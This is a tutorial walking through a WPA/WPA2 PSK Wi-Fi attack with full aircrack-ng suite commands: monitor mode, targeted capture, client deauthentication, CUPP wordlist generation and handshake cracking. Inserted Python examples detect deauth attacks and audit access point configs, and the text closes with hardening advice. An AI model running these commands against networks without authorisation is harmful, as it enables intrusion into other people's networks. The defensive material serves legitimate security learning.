Wi-Fi hacking is often synonymous with WPA/WPA2 PSK attacks, one of the most popular ways hackers attempt to compromise wireless networks. These attacks take advantage of weak pre-shared keys (passwords) by capturing a crucial piece of data known as the 4-way handshake during the network authentication process. Once captured, this data can be cracked using dictionary or brute-force attacks to reveal the network's password. The attack methodology involves several steps, starting from identifying the target network, capturing traffic, and forcing devices on the network to disconnect (using a deauthentication attack), all the way to cracking the captured handshake with tools like aircrack-ng. By generating custom wordlists with tools like CUPP and rsmangler, attackers can tailor their brute-force attempts to the specific target. This guide will walk you through the entire process, detailing the tools, techniques, and commands used, while also explaining how to secure your own network against such attacks.
Understanding how these attacks work is important not just for penetration testers and ethical hackers but for anyone looking to improve their cybersecurity defences. By gaining insight into how attackers operate, you can better protect your own network from vulnerabilities. Now, let's dive into the detailed steps for executing a WPA/WPA2 PSK attack.
Step-by-Step: WPA/WPA2 PSK Attack Methodology
Step 1: Checking Your Wi-Fi Adapter
To start, you need a Wi-Fi adapter that supports monitor mode and packet injection. Without this, you won't be able to capture the traffic needed for a successful attack. First, check if your adapter is available and compatible by running the iwconfig command.
iwconfig
This command will show the available network interfaces. Look for your wireless adapter (often listed as wlan0) and ensure it's recognized.
Step 2: Kill Interfering Processes
To ensure the Wi-Fi adapter can operate in monitor mode, you need to disable any processes that might interfere with it, such as NetworkManager. This step is crucial to ensure a clean and smooth traffic capture.
sudo airmon-ng check kill
This command terminates processes that could interfere with monitor mode, avoiding conflicts when you try to capture Wi-Fi traffic.
Step 3: Enable Monitor Mode
Once processes have been stopped, you can enable monitor mode on your Wi-Fi adapter. This allows you to listen to all traffic on the specified channel, including traffic that isn't meant for your device.
airmon-ng start wlan0
This command puts your wireless adapter into monitor mode, a prerequisite for capturing data packets from the network.
Step 4: Scan for Available Wi-Fi Networks
With your adapter in monitor mode, the next step is to scan for available Wi-Fi networks and identify your target. You can do this using airodump-ng, which will display all nearby networks along with their encryption types, channels, and other relevant data.
airodump-ng wlan0mon
The output of this command will display a list of all detected Wi-Fi networks. Take note of the BSSID (the MAC address of the router), the channel number, and the ESSID (network name) of the target network.
Step 5: Capture Traffic from the Target Network
Now that you've identified your target network, focus the traffic capture on that specific network. This will help you capture the 4-way handshake during the authentication process when a device connects to the network.
airodump-ng wlan0mon --channel 3 --essid "LESS SECURE WIFI" \
--bssid 5C:A6:E6:[REDACTED] --band bg -w less-secure
In this command:
- --channel 3 tells airodump-ng to focus on channel 3.
- --essid "LESS SECURE WIFI" specifies the target network name.
- --bssid 5C:A6:E6:[REDACTED] is the MAC address of the target access point.
- --band bg restricts the capture to the 2.4 GHz band (802.11b/g).
- -w less-secure saves the captured data to a file called less-secure-01.cap.
The goal here is to capture the 4-way handshake when a device connects to the network. To expedite this process, you may need to force a device on the network to reconnect using a deauthentication attack.
Step 6: Deauthenticating Clients
A deauthentication attack is used to disconnect a client from the Wi-Fi network, forcing it to reconnect. When the client reconnects, it will exchange the 4-way handshake, which you can then capture.
aireplay-ng -0 1 -a 5C:A6:E6:[REDACTED] -c 8A:97:20:[REDACTED] wlan0mon
In this command:
- -0 1 sends a single deauthentication packet.
- -a 5C:A6:E6:[REDACTED] is the BSSID of the target AP (router).
- -c 8A:97:20:[REDACTED] is the MAC address of the client to be disconnected.
If the network is not using Management Frame Protection (MFP), this will force the client to reconnect, generating the 4-way handshake. If MFP is enabled, deauthentication attacks will not work, and you’ll need to wait for a client to reconnect naturally.
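From the defender's side, the deauthentication step above has a recognisable signature on the air: a burst of deauth/disassoc frames spoofing the access point, followed by the victim client re-associating (which is what re-runs the 4-way handshake). The following is an added example, not code from the original article or from the aircrack-ng project, of two simple wireless-IDS rules run over a constructed list of management-frame records (timestamp, subtype, source, destination, BSSID); the MAC addresses and frame timings are hypothetical.

```python
from collections import deque

# Constructed sample 802.11 management frames (not a real capture), in the shape a
# monitor-mode sniffer would hand to a WIDS: (time_s, subtype, src, dst, bssid).
AP = "5C:A6:E6:AA:BB:CC"     # hypothetical access point MAC
STA = "8A:97:20:DD:EE:FF"    # hypothetical client MAC
BCAST = "FF:FF:FF:FF:FF:FF"

def constructed_capture():
    frames = [(0.0, "beacon", AP, BCAST, AP), (0.1, "data", STA, AP, AP)]
    # A burst of deauth frames addressed to one client, spoofing the AP, then the
    # client re-authenticating and re-associating, which re-runs the 4-way handshake.
    frames += [(1.0 + i * 0.002, "deauth", AP, STA, AP) for i in range(64)]
    frames += [(1.5, "auth", STA, AP, AP), (1.6, "assoc_req", STA, AP, AP)]
    # One isolated deauth much later, as an AP might send on idle timeout: no alert.
    frames.append((60.0, "deauth", AP, STA, AP))
    return frames

def detect_deauth_bursts(frames, window_s=1.0, threshold=10):
    """Alert (time, bssid, count) when deauth/disassoc frames claiming to come from
    one BSSID reach `threshold` inside a sliding window of `window_s` seconds."""
    recent, alerts = {}, []
    for t, subtype, src, dst, bssid in sorted(frames):
        if subtype not in ("deauth", "disassoc"):
            continue
        q = recent.setdefault(bssid, deque())
        q.append(t)
        while t - q[0] > window_s:        # drop timestamps that left the window
            q.popleft()
        if len(q) == threshold:           # fire once per burst, when the threshold is crossed
            alerts.append((t, bssid, len(q)))
    return alerts

def detect_bounces(frames, max_gap_s=5.0):
    """Flag clients that re-associate within max_gap_s of being deauthenticated:
    the sequence that produces a fresh handshake for an eavesdropper to record."""
    last_deauth, bounces = {}, []
    for t, subtype, src, dst, bssid in sorted(frames):
        if subtype in ("deauth", "disassoc") and dst != BCAST:
            last_deauth[(bssid, dst)] = t
        elif subtype == "assoc_req" and (bssid, src) in last_deauth:
            if t - last_deauth.pop((bssid, src)) <= max_gap_s:
                bounces.append((t, bssid, src))
    return bounces

if __name__ == "__main__":
    cap = constructed_capture()
    print("bursts:", detect_deauth_bursts(cap), "bounces:", detect_bounces(cap))
```

With MFP enabled (Step 6 and the protection list below), clients discard the forged frames, so the burst may still be seen on the air but no bounce follows it.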
Step 7: Confirm Handshake Capture
After the client reconnects, you should have captured the 4-way handshake; airodump-ng indicates this by showing "WPA handshake:" followed by the BSSID in the top right of its display. The .cap file is the most important one for us at this point.
ls -l less-secure-01.cap
Listing the file only confirms that it exists and has grown; it is this file that contains the handshake data essential for cracking the password.
Step 8: Create a Custom Wordlist Using CUPP
To crack the Wi-Fi password, you need a wordlist. A common tactic is to use CUPP (Common User Password Profiler) to generate a customized wordlist based on user-specific data.
Start by creating a basic wordlist:
cat wordlist.txt
less secure
less-secure.com
wifi
password
secret
Next, run CUPP to expand this wordlist:
cupp -w wordlist.txt
CUPP will generate a more extensive wordlist based on the initial inputs, which will increase your chances of cracking the password.
Step 9: Crack the Password
With the handshake captured and your custom wordlist ready, you can now attempt to crack the password using aircrack-ng.
aircrack-ng -w wordlist.txt.cupp.txt -e "LESS SECURE WIFI" \
-b 5C:A6:E6:[REDACTED] less-secure-01.cap
In this command:
- -w wordlist.txt.cupp.txt specifies the custom wordlist generated by CUPP.
- -e "LESS SECURE WIFI" is the network's ESSID (name).
- -b 5C:A6:E6:[REDACTED] is the BSSID (MAC address) of the target access point.
- less-secure-01.cap is the capture file containing the handshake.
If the password is present in the wordlist, aircrack-ng will display the cracked password.
Step 10: Stop Monitor Mode and Restart Network Services
Once you're done, restore your Wi-Fi adapter to its normal mode and restart any services that were stopped earlier.
1. Stop monitor mode:
airmon-ng stop wlan0mon
2. Restart NetworkManager:
systemctl restart NetworkManager
This will return your network connectivity to normal.
How to Protect Your Network from WPA/WPA2 PSK Attacks
- Use WPA3 Encryption: WPA3-Personal replaces the PSK 4-way handshake with SAE (Simultaneous Authentication of Equals), so a captured exchange cannot be cracked offline with a wordlist, which defeats the attack described above.
- Strong, Unique Passwords: Avoid common passwords or predictable patterns such as the network name or company domain. Use long, random passwords with a mix of letters, numbers, and symbols.
- Enable MFP (Management Frame Protection, 802.11w): it authenticates deauthentication and disassociation frames, so forged ones sent by an attacker are ignored by clients.
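The three recommendations map directly onto access point settings. As an added example, not taken from the article or from hostapd, here is a small audit script that parses two constructed hostapd.conf fragments, the weak WPA2-PSK configuration this guide attacks and its hardened WPA3-SAE equivalent, and reports which captured-handshake or deauthentication attack each weak setting leaves open; the passphrase values and the 20-character minimum are assumptions for the example.

```python
# Constructed hostapd.conf fragments (not from the page or any real deployment):
# WEAK_CONF mirrors a WPA2-PSK network with no management-frame protection,
# HARDENED_CONF its equivalent with WPA3-SAE and mandatory MFP (ieee80211w=2).
WEAK_CONF = """\
interface=wlan0
ssid=LESS SECURE WIFI
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_passphrase=password
rsn_pairwise=CCMP
ieee80211w=0
"""
HARDENED_CONF = """\
interface=wlan0
ssid=LESS SECURE WIFI
wpa=2
wpa_key_mgmt=SAE
sae_password=CONSTRUCTED-EXAMPLE-PSK-4c9f7e2a1b3d
rsn_pairwise=CCMP
ieee80211w=2
"""

def parse_hostapd(text):
    """Parse key=value lines of a hostapd.conf into a dict, skipping comments."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            key, value = line.split("=", 1)
            conf[key.strip()] = value.strip()
    return conf

def audit(conf, min_psk_len=20):
    """Return findings that map each weak setting to the attack it enables.
    min_psk_len is an assumed local policy threshold, not a standard value."""
    findings = []
    mgmt = conf.get("wpa_key_mgmt", "").split()
    if conf.get("wpa") != "2":
        findings.append("wpa!=2: WPA1/TKIP permitted; set wpa=2")
    if "SAE" not in mgmt:
        findings.append("no SAE: PSK 4-way handshake can be captured and cracked offline")
    if "WPA-PSK" in mgmt:
        findings.append("WPA-PSK offered: PSK handshake stays available even in transition mode")
    if conf.get("ieee80211w") != "2":
        findings.append("ieee80211w!=2: deauth/disassoc frames unprotected; forged deauth works")
    if "TKIP" in conf.get("rsn_pairwise", "") + conf.get("wpa_pairwise", ""):
        findings.append("TKIP cipher enabled; use CCMP only")
    secret = conf.get("sae_password") or conf.get("wpa_passphrase", "")
    if len(secret) < min_psk_len:
        findings.append(f"passphrase under {min_psk_len} chars: cheap dictionary target")
    return findings
```

Running audit(parse_hostapd(WEAK_CONF)) lists four findings for the weak configuration, while the hardened one produces none.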